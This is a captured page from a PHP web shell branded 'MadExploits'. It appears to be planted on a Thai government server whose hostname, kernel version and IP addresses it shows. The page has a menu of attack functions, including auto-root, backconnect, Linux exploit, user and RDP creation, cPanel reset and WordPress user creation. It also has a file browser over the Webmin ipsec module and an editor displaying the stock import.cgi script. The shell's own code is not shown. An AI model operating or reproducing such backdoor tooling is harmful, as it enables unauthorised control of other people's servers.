Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
ipsec /
[ HOME SHELL ]
Name
Size
Permission
Action
help
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
239
B
-rw-r--r--
backup_config.pl
694
B
-rwxr-xr-x
bootup.cgi
381
B
-rwxr-xr-x
config
241
B
-rw-r--r--
config-Amazon-Linux-2-ALL
235
B
-rw-r--r--
config-CentOS-Linux-7.0-ALL
235
B
-rw-r--r--
config-Redhat-Enterprise-Linux...
235
B
-rw-r--r--
config-Scientific-Linux-7.0-AL...
235
B
-rw-r--r--
config-coherent-linux
256
B
-rw-r--r--
config-debian-linux
235
B
-rw-r--r--
config-mandrake-linux
250
B
-rw-r--r--
config-openmamba-linux
250
B
-rw-r--r--
config-redhat-linux
256
B
-rw-r--r--
config-suse-linux-8.2-ALL
235
B
-rw-r--r--
config-syno-linux
241
B
-rw-r--r--
config-trustix-linux
235
B
-rw-r--r--
config.info
342
B
-rw-r--r--
config.info.ca
378
B
-rw-r--r--
config.info.ca.UTF-8
381
B
-rw-r--r--
config.info.de
386
B
-rw-r--r--
config.info.de.UTF-8
386
B
-rw-r--r--
config.info.es
399
B
-rw-r--r--
config.info.es.UTF-8
401
B
-rw-r--r--
config.info.fr
395
B
-rw-r--r--
config.info.fr.UTF-8
395
B
-rw-r--r--
config.info.nl
388
B
-rw-r--r--
config.info.nl.UTF-8
388
B
-rw-r--r--
config.info.no
373
B
-rw-r--r--
config.info.no.UTF-8
373
B
-rw-r--r--
edit.cgi
8.25
KB
-rwxr-xr-x
edit_config.cgi
3.6
KB
-rwxr-xr-x
edit_policy.cgi
1.3
KB
-rwxr-xr-x
edit_secret.cgi
2.1
KB
-rwxr-xr-x
export.cgi
934
B
-rwxr-xr-x
export_form.cgi
776
B
-rwxr-xr-x
import.cgi
1.61
KB
-rwxr-xr-x
import_form.cgi
776
B
-rwxr-xr-x
index.cgi
5.21
KB
-rwxr-xr-x
install_check.pl
450
B
-rwxr-xr-x
ipsec-lib.pl
10.31
KB
-rwxr-xr-x
list_secrets.cgi
1.08
KB
-rwxr-xr-x
log_parser.pl
820
B
-rwxr-xr-x
module.info
184
B
-rw-r--r--
module.info.ca
121
B
-rw-r--r--
module.info.ca.UTF-8
134
B
-rw-r--r--
module.info.cz
29
B
-rw-r--r--
module.info.cz.UTF-8
35
B
-rw-r--r--
module.info.de
119
B
-rw-r--r--
module.info.de.UTF-8
131
B
-rw-r--r--
module.info.es
35
B
-rw-r--r--
module.info.es.UTF-8
42
B
-rw-r--r--
module.info.ms_MY
128
B
-rw-r--r--
module.info.ms_MY.UTF-8
140
B
-rw-r--r--
module.info.nl
31
B
-rw-r--r--
module.info.nl.UTF-8
37
B
-rw-r--r--
module.info.no
32
B
-rw-r--r--
module.info.no.UTF-8
38
B
-rw-r--r--
newkey.cgi
388
B
-rwxr-xr-x
restart.cgi
210
B
-rwxr-xr-x
save.cgi
4.8
KB
-rwxr-xr-x
save_config.cgi
1.8
KB
-rwxr-xr-x
save_policy.cgi
717
B
-rwxr-xr-x
save_secret.cgi
1.53
KB
-rwxr-xr-x
showkey.cgi
861
B
-rwxr-xr-x
start.cgi
281
B
-rwxr-xr-x
stop.cgi
243
B
-rwxr-xr-x
up.cgi
783
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : import.cgi
#!/usr/bin/perl # import.cgi # Add an imported connection to the config file require './ipsec-lib.pl'; &ReadParseMime(); &error_setup($text{'import_err'}); # Get the file if ($in{'mode'} == 0) { $in{'upload'} || &error($text{'import_eupload'}); $in{'upload'} =~ s/\r//g; @data = split(/\n/, $in{'upload'}); } else { $in{'file'} || &error($text{'import_efile'}); open(FILE, $in{'file'}) || &error($text{'import_eopen'}); while(<FILE>) { s/\r|\n//g; push(@data, $_); } close(FILE); } # Read and validate it $temp = &transname(); open(TEMP, ">$temp"); print TEMP map { "$_\n" } @data; close(TEMP); @iconf = &get_config($temp); unlink($temp); if (@iconf != 1 || $iconf[0]->{'name'} ne 'conn') { &error($text{'import_eformat'}); } @conf = &get_config(); foreach $c (@conf) { if (lc($c->{'value'}) eq lc($iconf[0]->{'value'})) { $clash = $c; if (!$in{'over'}) { &error(&text('import_eclash', "<tt>$iconf[0]->{'value'}</tt>")); } } } # Add to the real config file if ($clash) { &lock_file($clash->{'file'}); $lref = &read_file_lines($clash->{'file'}); splice(@$lref, $clash->{'line'}, $clash->{'eline'} - $clash->{'line'} + 1, @data); } else { &lock_file($config{'file'}); $lref = &read_file_lines($config{'file'}); push(@$lref, @data); } &flush_file_lines(); &unlock_all_files(); # Tell the user &ui_print_header(undef, $text{'import_title'}, ""); print "<p>",&text($clash ? 'import_done2' : 'import_done1', "<tt>$iconf[0]->{'value'}</tt>"),"<p>\n"; &ui_print_footer("", $text{'index_return'}); # All done &webmin_log("import", "conn", $iconf[0]->{'value'}, $iconf[0]->{'values'});
Close